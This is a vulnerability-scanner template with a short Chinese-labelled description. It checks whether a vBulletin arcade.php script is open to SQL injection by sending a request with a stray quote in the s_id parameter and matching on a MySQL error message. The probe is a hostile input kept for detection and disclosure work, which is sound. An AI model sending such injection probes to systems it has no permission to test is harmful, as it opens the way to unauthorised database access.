漏洞描述
The arcade.php script is vulnerable to SQL injection. By exploiting this vulnerability, an attacker can manipulate the SQL queries executed by the script, potentially gaining unauthorized access to the database.
arcade-php-sqli: Arcade.php - SQL Injection
PoC代码[已公开]
id: arcade-php-sqli
info:
name: Arcade.php - SQL Injection
author: MaStErChO
severity: high
description: |
The arcade.php script is vulnerable to SQL injection. By exploiting this vulnerability, an attacker can manipulate the SQL queries executed by the script, potentially gaining unauthorized access to the database.
reference:
- https://www.exploit-db.com/exploits/29604
- https://github.com/OWASP/vbscan/
metadata:
verified: true
max-request: 1
tags: arcade,php,vbulletin,sqli,vuln
http:
- method: GET
path:
- "{{BaseURL}}/arcade.php?act=Arcade&do=stats&comment=a&s_id=1'"
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: word
part: body
words:
- "mySQL query error"
- type: status
status:
- 200
# digest: 4b0a0048304602210080fbe2a62bf7a6c3d55300c54dd7a396d94e8744f9b8691ebd7a5ffef5e39307022100b73237ce187da0274d5cd0b42b329ca9b6ed80e399458fc7d717297b4bdc3e4b:922c64590222798bb761d5b6d8e72950